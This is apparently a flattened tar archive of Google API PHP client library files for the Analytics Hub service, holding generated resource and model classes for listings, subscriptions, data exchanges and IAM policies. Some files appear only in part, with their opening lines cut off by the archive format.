Google\Service\AnalyticsHub(...); * $locations = $analyticshubService->organizations_locations; * */ class OrganizationsLocations extends \Google\Service\Resource { } // Adding a class alias for backwards compatibility with the previous class name. class_alias(OrganizationsLocations::class, 'Google_Service_AnalyticsHub_Resource_OrganizationsLocations'); vendor/google/apiclient-services/src/AnalyticsHub/Resource/OrganizationsLocationsDataExchanges.php000064400000004273147600400120031652 0ustar00google-api * $analyticshubService = new Google\Service\AnalyticsHub(...); * $dataExchanges = $analyticshubService->organizations_locations_dataExchanges; * */ class OrganizationsLocationsDataExchanges extends \Google\Service\Resource { /** * Lists all data exchanges from projects in a given organization and location. * (dataExchanges.listOrganizationsLocationsDataExchanges) * * @param string $organization Required. The organization resource path of the * projects containing DataExchanges. e.g. `organizations/myorg/locations/US`. * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of results to return in a single * response page. Leverage the page tokens to iterate through the entire * collection. * @opt_param string pageToken Page token, returned by a previous call, to * request the next page of results. * @return ListOrgDataExchangesResponse */ public function listOrganizationsLocationsDataExchanges($organization, $optParams = []) { $params = ['organization' => $organization]; $params = array_merge($params, $optParams); return $this->call('list', [$params], ListOrgDataExchangesResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(OrganizationsLocationsDataExchanges::class, 'Google_Service_AnalyticsHub_Resource_OrganizationsLocationsDataExchanges'); google/apiclient-services/src/AnalyticsHub/Resource/ProjectsLocationsDataExchangesListings.php000064400000022264147600400120032331 0ustar00google-api/vendor * $analyticshubService = new Google\Service\AnalyticsHub(...); * $listings = $analyticshubService->projects_locations_dataExchanges_listings; * */ class ProjectsLocationsDataExchangesListings extends \Google\Service\Resource { /** * Creates a new listing. (listings.create) * * @param string $parent Required. The parent resource path of the listing. e.g. * `projects/myproject/locations/US/dataExchanges/123`. * @param Listing $postBody * @param array $optParams Optional parameters. * * @opt_param string listingId Required. The ID of the listing to create. Must * contain only Unicode letters, numbers (0-9), underscores (_). Should not use * characters that require URL-escaping, or characters outside of ASCII, spaces. * Max length: 100 bytes. * @return Listing */ public function create($parent, Listing $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('create', [$params], Listing::class); } /** * Deletes a listing. (listings.delete) * * @param string $name Required. Resource name of the listing to delete. e.g. * `projects/myproject/locations/US/dataExchanges/123/listings/456`. * @param array $optParams Optional parameters. * @return AnalyticshubEmpty */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = array_merge($params, $optParams); return $this->call('delete', [$params], AnalyticshubEmpty::class); } /** * Gets the details of a listing. (listings.get) * * @param string $name Required. The resource name of the listing. e.g. * `projects/myproject/locations/US/dataExchanges/123/listings/456`. * @param array $optParams Optional parameters. * @return Listing */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = array_merge($params, $optParams); return $this->call('get', [$params], Listing::class); } /** * Gets the IAM policy. (listings.getIamPolicy) * * @param string $resource REQUIRED: The resource for which the policy is being * requested. See [Resource * names](https://cloud.google.com/apis/design/resource_names) for the * appropriate value for this field. * @param GetIamPolicyRequest $postBody * @param array $optParams Optional parameters. * @return Policy */ public function getIamPolicy($resource, GetIamPolicyRequest $postBody, $optParams = []) { $params = ['resource' => $resource, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('getIamPolicy', [$params], Policy::class); } /** * Lists all listings in a given project and location. * (listings.listProjectsLocationsDataExchangesListings) * * @param string $parent Required. The parent resource path of the listing. e.g. * `projects/myproject/locations/US/dataExchanges/123`. * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of results to return in a single * response page. Leverage the page tokens to iterate through the entire * collection. * @opt_param string pageToken Page token, returned by a previous call, to * request the next page of results. * @return ListListingsResponse */ public function listProjectsLocationsDataExchangesListings($parent, $optParams = []) { $params = ['parent' => $parent]; $params = array_merge($params, $optParams); return $this->call('list', [$params], ListListingsResponse::class); } /** * Lists all subscriptions on a given Data Exchange or Listing. * (listings.listSubscriptions) * * @param string $resource Required. Resource name of the requested target. This * resource may be either a Listing or a DataExchange. e.g. * projects/123/locations/US/dataExchanges/456 OR e.g. * projects/123/locations/US/dataExchanges/456/listings/789 * @param array $optParams Optional parameters. * * @opt_param bool includeDeletedSubscriptions If selected, includes deleted * subscriptions in the response (up to 63 days after deletion). * @opt_param int pageSize The maximum number of results to return in a single * response page. * @opt_param string pageToken Page token, returned by a previous call. * @return ListSharedResourceSubscriptionsResponse */ public function listSubscriptions($resource, $optParams = []) { $params = ['resource' => $resource]; $params = array_merge($params, $optParams); return $this->call('listSubscriptions', [$params], ListSharedResourceSubscriptionsResponse::class); } /** * Updates an existing listing. (listings.patch) * * @param string $name Output only. The resource name of the listing. e.g. * `projects/myproject/locations/US/dataExchanges/123/listings/456` * @param Listing $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. Field mask specifies the fields to * update in the listing resource. The fields specified in the `updateMask` are * relative to the resource and are not a full request. * @return Listing */ public function patch($name, Listing $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('patch', [$params], Listing::class); } /** * Sets the IAM policy. (listings.setIamPolicy) * * @param string $resource REQUIRED: The resource for which the policy is being * specified. See [Resource * names](https://cloud.google.com/apis/design/resource_names) for the * appropriate value for this field. * @param SetIamPolicyRequest $postBody * @param array $optParams Optional parameters. * @return Policy */ public function setIamPolicy($resource, SetIamPolicyRequest $postBody, $optParams = []) { $params = ['resource' => $resource, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('setIamPolicy', [$params], Policy::class); } /** * Subscribes to a listing. Currently, with Analytics Hub, you can create * listings that reference only BigQuery datasets. Upon subscription to a * listing for a BigQuery dataset, Analytics Hub creates a linked dataset in the * subscriber's project. (listings.subscribe) * * @param string $name Required. Resource name of the listing that you want to * subscribe to. e.g. * `projects/myproject/locations/US/dataExchanges/123/listings/456`. * @param SubscribeListingRequest $postBody * @param array $optParams Optional parameters. * @return SubscribeListingResponse */ public function subscribe($name, SubscribeListingRequest $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('subscribe', [$params], SubscribeListingResponse::class); } /** * Returns the permissions that a caller has. (listings.testIamPermissions) * * @param string $resource REQUIRED: The resource for which the policy detail is * being requested. See [Resource * names](https://cloud.google.com/apis/design/resource_names) for the * appropriate value for this field. * @param TestIamPermissionsRequest $postBody * @param array $optParams Optional parameters. * @return TestIamPermissionsResponse */ public function testIamPermissions($resource, TestIamPermissionsRequest $postBody, $optParams = []) { $params = ['resource' => $resource, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('testIamPermissions', [$params], TestIamPermissionsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ProjectsLocationsDataExchangesListings::class, 'Google_Service_AnalyticsHub_Resource_ProjectsLocationsDataExchangesListings'); vendor/google/apiclient-services/src/AnalyticsHub/Resource/ProjectsLocationsSubscriptions.php000064400000014171147600400120030762 0ustar00google-api * $analyticshubService = new Google\Service\AnalyticsHub(...); * $subscriptions = $analyticshubService->projects_locations_subscriptions; * */ class ProjectsLocationsSubscriptions extends \Google\Service\Resource { /** * Deletes a subscription. (subscriptions.delete) * * @param string $name Required. Resource name of the subscription to delete. * e.g. projects/123/locations/US/subscriptions/456 * @param array $optParams Optional parameters. * @return Operation */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = array_merge($params, $optParams); return $this->call('delete', [$params], Operation::class); } /** * Gets the details of a Subscription. (subscriptions.get) * * @param string $name Required. Resource name of the subscription. e.g. * projects/123/locations/US/subscriptions/456 * @param array $optParams Optional parameters. * @return Subscription */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = array_merge($params, $optParams); return $this->call('get', [$params], Subscription::class); } /** * Gets the IAM policy. (subscriptions.getIamPolicy) * * @param string $resource REQUIRED: The resource for which the policy is being * requested. See [Resource * names](https://cloud.google.com/apis/design/resource_names) for the * appropriate value for this field. * @param GetIamPolicyRequest $postBody * @param array $optParams Optional parameters. * @return Policy */ public function getIamPolicy($resource, GetIamPolicyRequest $postBody, $optParams = []) { $params = ['resource' => $resource, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('getIamPolicy', [$params], Policy::class); } /** * Lists all subscriptions in a given project and location. * (subscriptions.listProjectsLocationsSubscriptions) * * @param string $parent Required. The parent resource path of the subscription. * e.g. projects/myproject/locations/US * @param array $optParams Optional parameters. * * @opt_param string filter The filter expression may be used to filter by Data * Exchange or Listing. * @opt_param int pageSize The maximum number of results to return in a single * response page. * @opt_param string pageToken Page token, returned by a previous call. * @return ListSubscriptionsResponse */ public function listProjectsLocationsSubscriptions($parent, $optParams = []) { $params = ['parent' => $parent]; $params = array_merge($params, $optParams); return $this->call('list', [$params], ListSubscriptionsResponse::class); } /** * Refreshes a Subscription to a Data Exchange. A Data Exchange can become stale * when a publisher adds or removes data. This is a long-running operation as it * may create many linked datasets. (subscriptions.refresh) * * @param string $name Required. Resource name of the Subscription to refresh. * e.g. `projects/subscriberproject/locations/US/subscriptions/123` * @param RefreshSubscriptionRequest $postBody * @param array $optParams Optional parameters. * @return Operation */ public function refresh($name, RefreshSubscriptionRequest $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('refresh', [$params], Operation::class); } /** * Revokes a given subscription. (subscriptions.revoke) * * @param string $name Required. Resource name of the subscription to revoke. * e.g. projects/123/locations/US/subscriptions/456 * @param RevokeSubscriptionRequest $postBody * @param array $optParams Optional parameters. * @return RevokeSubscriptionResponse */ public function revoke($name, RevokeSubscriptionRequest $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('revoke', [$params], RevokeSubscriptionResponse::class); } /** * Sets the IAM policy. (subscriptions.setIamPolicy) * * @param string $resource REQUIRED: The resource for which the policy is being * specified. See [Resource * names](https://cloud.google.com/apis/design/resource_names) for the * appropriate value for this field. * @param SetIamPolicyRequest $postBody * @param array $optParams Optional parameters. * @return Policy */ public function setIamPolicy($resource, SetIamPolicyRequest $postBody, $optParams = []) { $params = ['resource' => $resource, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('setIamPolicy', [$params], Policy::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ProjectsLocationsSubscriptions::class, 'Google_Service_AnalyticsHub_Resource_ProjectsLocationsSubscriptions'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/Resource/ProjectsLocations.php000064400000002124147600400120026244 0ustar00 * $analyticshubService = new Google\Service\AnalyticsHub(...); * $locations = $analyticshubService->projects_locations; * */ class ProjectsLocations extends \Google\Service\Resource { } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ProjectsLocations::class, 'Google_Service_AnalyticsHub_Resource_ProjectsLocations'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/Resource/Organizations.php000064400000002113147600400120025424 0ustar00 * $analyticshubService = new Google\Service\AnalyticsHub(...); * $organizations = $analyticshubService->organizations; * */ class Organizations extends \Google\Service\Resource { } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Organizations::class, 'Google_Service_AnalyticsHub_Resource_Organizations'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/Resource/Projects.php000064400000002055147600400120024373 0ustar00 * $analyticshubService = new Google\Service\AnalyticsHub(...); * $projects = $analyticshubService->projects; * */ class Projects extends \Google\Service\Resource { } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Projects::class, 'Google_Service_AnalyticsHub_Resource_Projects'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/DcrExchangeConfig.php000064400000001533147600400120024314 0ustar00subscription = $subscription; } /** * @return Subscription */ public function getSubscription() { return $this->subscription; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RefreshSubscriptionResponse::class, 'Google_Service_AnalyticsHub_RefreshSubscriptionResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/Location.php000064400000004141147600400120022561 0ustar00displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string[] */ public function setLabels($labels) { $this->labels = $labels; } /** * @return string[] */ public function getLabels() { return $this->labels; } /** * @param string */ public function setLocationId($locationId) { $this->locationId = $locationId; } /** * @return string */ public function getLocationId() { return $this->locationId; } /** * @param array[] */ public function setMetadata($metadata) { $this->metadata = $metadata; } /** * @return array[] */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Location::class, 'Google_Service_AnalyticsHub_Location'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/SharingEnvironmentConfig.php000064400000003561147600400120025764 0ustar00dcrExchangeConfig = $dcrExchangeConfig; } /** * @return DcrExchangeConfig */ public function getDcrExchangeConfig() { return $this->dcrExchangeConfig; } /** * @param DefaultExchangeConfig */ public function setDefaultExchangeConfig(DefaultExchangeConfig $defaultExchangeConfig) { $this->defaultExchangeConfig = $defaultExchangeConfig; } /** * @return DefaultExchangeConfig */ public function getDefaultExchangeConfig() { return $this->defaultExchangeConfig; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SharingEnvironmentConfig::class, 'Google_Service_AnalyticsHub_SharingEnvironmentConfig'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/Binding.php000064400000003266147600400120022372 0ustar00condition = $condition; } /** * @return Expr */ public function getCondition() { return $this->condition; } /** * @param string[] */ public function setMembers($members) { $this->members = $members; } /** * @return string[] */ public function getMembers() { return $this->members; } /** * @param string */ public function setRole($role) { $this->role = $role; } /** * @return string */ public function getRole() { return $this->role; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Binding::class, 'Google_Service_AnalyticsHub_Binding'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/Subscription.php000064400000007505147600400120023504 0ustar00creationTime = $creationTime; } /** * @return string */ public function getCreationTime() { return $this->creationTime; } /** * @param string */ public function setDataExchange($dataExchange) { $this->dataExchange = $dataExchange; } /** * @return string */ public function getDataExchange() { return $this->dataExchange; } /** * @param string */ public function setLastModifyTime($lastModifyTime) { $this->lastModifyTime = $lastModifyTime; } /** * @return string */ public function getLastModifyTime() { return $this->lastModifyTime; } /** * @param LinkedResource[] */ public function setLinkedDatasetMap($linkedDatasetMap) { $this->linkedDatasetMap = $linkedDatasetMap; } /** * @return LinkedResource[] */ public function getLinkedDatasetMap() { return $this->linkedDatasetMap; } /** * @param string */ public function setListing($listing) { $this->listing = $listing; } /** * @return string */ public function getListing() { return $this->listing; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setOrganizationDisplayName($organizationDisplayName) { $this->organizationDisplayName = $organizationDisplayName; } /** * @return string */ public function getOrganizationDisplayName() { return $this->organizationDisplayName; } /** * @param string */ public function setOrganizationId($organizationId) { $this->organizationId = $organizationId; } /** * @return string */ public function getOrganizationId() { return $this->organizationId; } /** * @param string */ public function setState($state) { $this->state = $state; } /** * @return string */ public function getState() { return $this->state; } /** * @param string */ public function setSubscriberContact($subscriberContact) { $this->subscriberContact = $subscriberContact; } /** * @return string */ public function getSubscriberContact() { return $this->subscriberContact; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Subscription::class, 'Google_Service_AnalyticsHub_Subscription'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/GetIamPolicyRequest.php000064400000002347147600400120024716 0ustar00options = $options; } /** * @return GetPolicyOptions */ public function getOptions() { return $this->options; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GetIamPolicyRequest::class, 'Google_Service_AnalyticsHub_GetIamPolicyRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/SubscribeListingResponse.php000064400000002417147600400120026007 0ustar00subscription = $subscription; } /** * @return Subscription */ public function getSubscription() { return $this->subscription; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SubscribeListingResponse::class, 'Google_Service_AnalyticsHub_SubscribeListingResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/Expr.php000064400000003533147600400120021733 0ustar00description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setExpression($expression) { $this->expression = $expression; } /** * @return string */ public function getExpression() { return $this->expression; } /** * @param string */ public function setLocation($location) { $this->location = $location; } /** * @return string */ public function getLocation() { return $this->location; } /** * @param string */ public function setTitle($title) { $this->title = $title; } /** * @return string */ public function getTitle() { return $this->title; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Expr::class, 'Google_Service_AnalyticsHub_Expr'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/Status.php000064400000003113147600400120022272 0ustar00code = $code; } /** * @return int */ public function getCode() { return $this->code; } /** * @param array[] */ public function setDetails($details) { $this->details = $details; } /** * @return array[] */ public function getDetails() { return $this->details; } /** * @param string */ public function setMessage($message) { $this->message = $message; } /** * @return string */ public function getMessage() { return $this->message; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Status::class, 'Google_Service_AnalyticsHub_Status'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/AuditLogConfig.php000064400000002705147600400120023653 0ustar00exemptedMembers = $exemptedMembers; } /** * @return string[] */ public function getExemptedMembers() { return $this->exemptedMembers; } /** * @param string */ public function setLogType($logType) { $this->logType = $logType; } /** * @return string */ public function getLogType() { return $this->logType; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AuditLogConfig::class, 'Google_Service_AnalyticsHub_AuditLogConfig'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/Policy.php000064400000004106147600400120022251 0ustar00auditConfigs = $auditConfigs; } /** * @return AuditConfig[] */ public function getAuditConfigs() { return $this->auditConfigs; } /** * @param Binding[] */ public function setBindings($bindings) { $this->bindings = $bindings; } /** * @return Binding[] */ public function getBindings() { return $this->bindings; } /** * @param string */ public function setEtag($etag) { $this->etag = $etag; } /** * @return string */ public function getEtag() { return $this->etag; } /** * @param int */ public function setVersion($version) { $this->version = $version; } /** * @return int */ public function getVersion() { return $this->version; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Policy::class, 'Google_Service_AnalyticsHub_Policy'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/DestinationDataset.php000064400000004655147600400120024612 0ustar00datasetReference = $datasetReference; } /** * @return DestinationDatasetReference */ public function getDatasetReference() { return $this->datasetReference; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setFriendlyName($friendlyName) { $this->friendlyName = $friendlyName; } /** * @return string */ public function getFriendlyName() { return $this->friendlyName; } /** * @param string[] */ public function setLabels($labels) { $this->labels = $labels; } /** * @return string[] */ public function getLabels() { return $this->labels; } /** * @param string */ public function setLocation($location) { $this->location = $location; } /** * @return string */ public function getLocation() { return $this->location; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DestinationDataset::class, 'Google_Service_AnalyticsHub_DestinationDataset'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/AuditConfig.php000064400000003076147600400120023213 0ustar00auditLogConfigs = $auditLogConfigs; } /** * @return AuditLogConfig[] */ public function getAuditLogConfigs() { return $this->auditLogConfigs; } /** * @param string */ public function setService($service) { $this->service = $service; } /** * @return string */ public function getService() { return $this->service; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AuditConfig::class, 'Google_Service_AnalyticsHub_AuditConfig'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/SetIamPolicyRequest.php000064400000002700147600400120024723 0ustar00policy = $policy; } /** * @return Policy */ public function getPolicy() { return $this->policy; } /** * @param string */ public function setUpdateMask($updateMask) { $this->updateMask = $updateMask; } /** * @return string */ public function getUpdateMask() { return $this->updateMask; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SetIamPolicyRequest::class, 'Google_Service_AnalyticsHub_SetIamPolicyRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/TestIamPermissionsRequest.php000064400000002307147600400120026166 0ustar00permissions = $permissions; } /** * @return string[] */ public function getPermissions() { return $this->permissions; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(TestIamPermissionsRequest::class, 'Google_Service_AnalyticsHub_TestIamPermissionsRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/Publisher.php000064400000002536147600400120022754 0ustar00name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setPrimaryContact($primaryContact) { $this->primaryContact = $primaryContact; } /** * @return string */ public function getPrimaryContact() { return $this->primaryContact; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Publisher::class, 'Google_Service_AnalyticsHub_Publisher'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/ListListingsResponse.php000064400000003041147600400120025156 0ustar00listings = $listings; } /** * @return Listing[] */ public function getListings() { return $this->listings; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ListListingsResponse::class, 'Google_Service_AnalyticsHub_ListListingsResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/ListSubscriptionsResponse.php000064400000003166147600400120026241 0ustar00nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param Subscription[] */ public function setSubscriptions($subscriptions) { $this->subscriptions = $subscriptions; } /** * @return Subscription[] */ public function getSubscriptions() { return $this->subscriptions; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ListSubscriptionsResponse::class, 'Google_Service_AnalyticsHub_ListSubscriptionsResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/GetPolicyOptions.php000064400000002270147600400120024265 0ustar00requestedPolicyVersion = $requestedPolicyVersion; } /** * @return int */ public function getRequestedPolicyVersion() { return $this->requestedPolicyVersion; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GetPolicyOptions::class, 'Google_Service_AnalyticsHub_GetPolicyOptions'); vendor/google/apiclient-services/src/AnalyticsHub/ListSharedResourceSubscriptionsResponse.php000064400000003454147600400120031021 0ustar00google-apinextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param Subscription[] */ public function setSharedResourceSubscriptions($sharedResourceSubscriptions) { $this->sharedResourceSubscriptions = $sharedResourceSubscriptions; } /** * @return Subscription[] */ public function getSharedResourceSubscriptions() { return $this->sharedResourceSubscriptions; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ListSharedResourceSubscriptionsResponse::class, 'Google_Service_AnalyticsHub_ListSharedResourceSubscriptionsResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/BigQueryDatasetSource.php000064400000002147147600400120025233 0ustar00dataset = $dataset; } /** * @return string */ public function getDataset() { return $this->dataset; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(BigQueryDatasetSource::class, 'Google_Service_AnalyticsHub_BigQueryDatasetSource'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/SubscribeListingRequest.php000064400000002540147600400120025636 0ustar00destinationDataset = $destinationDataset; } /** * @return DestinationDataset */ public function getDestinationDataset() { return $this->destinationDataset; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SubscribeListingRequest::class, 'Google_Service_AnalyticsHub_SubscribeListingRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/RefreshSubscriptionRequest.php000064400000001566147600400120026375 0ustar00locations = $locations; } /** * @return Location[] */ public function getLocations() { return $this->locations; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ListLocationsResponse::class, 'Google_Service_AnalyticsHub_ListLocationsResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/Operation.php000064400000004145147600400120022755 0ustar00done = $done; } /** * @return bool */ public function getDone() { return $this->done; } /** * @param Status */ public function setError(Status $error) { $this->error = $error; } /** * @return Status */ public function getError() { return $this->error; } /** * @param array[] */ public function setMetadata($metadata) { $this->metadata = $metadata; } /** * @return array[] */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param array[] */ public function setResponse($response) { $this->response = $response; } /** * @return array[] */ public function getResponse() { return $this->response; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Operation::class, 'Google_Service_AnalyticsHub_Operation'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/Listing.php000064400000012050147600400120022420 0ustar00bigqueryDataset = $bigqueryDataset; } /** * @return BigQueryDatasetSource */ public function getBigqueryDataset() { return $this->bigqueryDataset; } /** * @param string[] */ public function setCategories($categories) { $this->categories = $categories; } /** * @return string[] */ public function getCategories() { return $this->categories; } /** * @param DataProvider */ public function setDataProvider(DataProvider $dataProvider) { $this->dataProvider = $dataProvider; } /** * @return DataProvider */ public function getDataProvider() { return $this->dataProvider; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setDocumentation($documentation) { $this->documentation = $documentation; } /** * @return string */ public function getDocumentation() { return $this->documentation; } /** * @param string */ public function setIcon($icon) { $this->icon = $icon; } /** * @return string */ public function getIcon() { return $this->icon; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setPrimaryContact($primaryContact) { $this->primaryContact = $primaryContact; } /** * @return string */ public function getPrimaryContact() { return $this->primaryContact; } /** * @param Publisher */ public function setPublisher(Publisher $publisher) { $this->publisher = $publisher; } /** * @return Publisher */ public function getPublisher() { return $this->publisher; } /** * @param string */ public function setRequestAccess($requestAccess) { $this->requestAccess = $requestAccess; } /** * @return string */ public function getRequestAccess() { return $this->requestAccess; } /** * @param RestrictedExportConfig */ public function setRestrictedExportConfig(RestrictedExportConfig $restrictedExportConfig) { $this->restrictedExportConfig = $restrictedExportConfig; } /** * @return RestrictedExportConfig */ public function getRestrictedExportConfig() { return $this->restrictedExportConfig; } /** * @param string */ public function setState($state) { $this->state = $state; } /** * @return string */ public function getState() { return $this->state; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Listing::class, 'Google_Service_AnalyticsHub_Listing'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/RevokeSubscriptionResponse.php000064400000001566147600400120026400 0ustar00dataExchanges = $dataExchanges; } /** * @return DataExchange[] */ public function getDataExchanges() { return $this->dataExchanges; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ListOrgDataExchangesResponse::class, 'Google_Service_AnalyticsHub_ListOrgDataExchangesResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/DefaultExchangeConfig.php000064400000001547147600400120025175 0ustar00datasetId = $datasetId; } /** * @return string */ public function getDatasetId() { return $this->datasetId; } /** * @param string */ public function setProjectId($projectId) { $this->projectId = $projectId; } /** * @return string */ public function getProjectId() { return $this->projectId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DestinationDatasetReference::class, 'Google_Service_AnalyticsHub_DestinationDatasetReference'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/DataExchange.php000064400000006417147600400120023335 0ustar00description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setDocumentation($documentation) { $this->documentation = $documentation; } /** * @return string */ public function getDocumentation() { return $this->documentation; } /** * @param string */ public function setIcon($icon) { $this->icon = $icon; } /** * @return string */ public function getIcon() { return $this->icon; } /** * @param int */ public function setListingCount($listingCount) { $this->listingCount = $listingCount; } /** * @return int */ public function getListingCount() { return $this->listingCount; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setPrimaryContact($primaryContact) { $this->primaryContact = $primaryContact; } /** * @return string */ public function getPrimaryContact() { return $this->primaryContact; } /** * @param SharingEnvironmentConfig */ public function setSharingEnvironmentConfig(SharingEnvironmentConfig $sharingEnvironmentConfig) { $this->sharingEnvironmentConfig = $sharingEnvironmentConfig; } /** * @return SharingEnvironmentConfig */ public function getSharingEnvironmentConfig() { return $this->sharingEnvironmentConfig; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DataExchange::class, 'Google_Service_AnalyticsHub_DataExchange'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/SubscribeDataExchangeRequest.php000064400000003377147600400120026552 0ustar00destination = $destination; } /** * @return string */ public function getDestination() { return $this->destination; } /** * @param string */ public function setSubscriberContact($subscriberContact) { $this->subscriberContact = $subscriberContact; } /** * @return string */ public function getSubscriberContact() { return $this->subscriberContact; } /** * @param string */ public function setSubscription($subscription) { $this->subscription = $subscription; } /** * @return string */ public function getSubscription() { return $this->subscription; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SubscribeDataExchangeRequest::class, 'Google_Service_AnalyticsHub_SubscribeDataExchangeRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/RevokeSubscriptionRequest.php000064400000001563147600400120026227 0ustar00name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setPrimaryContact($primaryContact) { $this->primaryContact = $primaryContact; } /** * @return string */ public function getPrimaryContact() 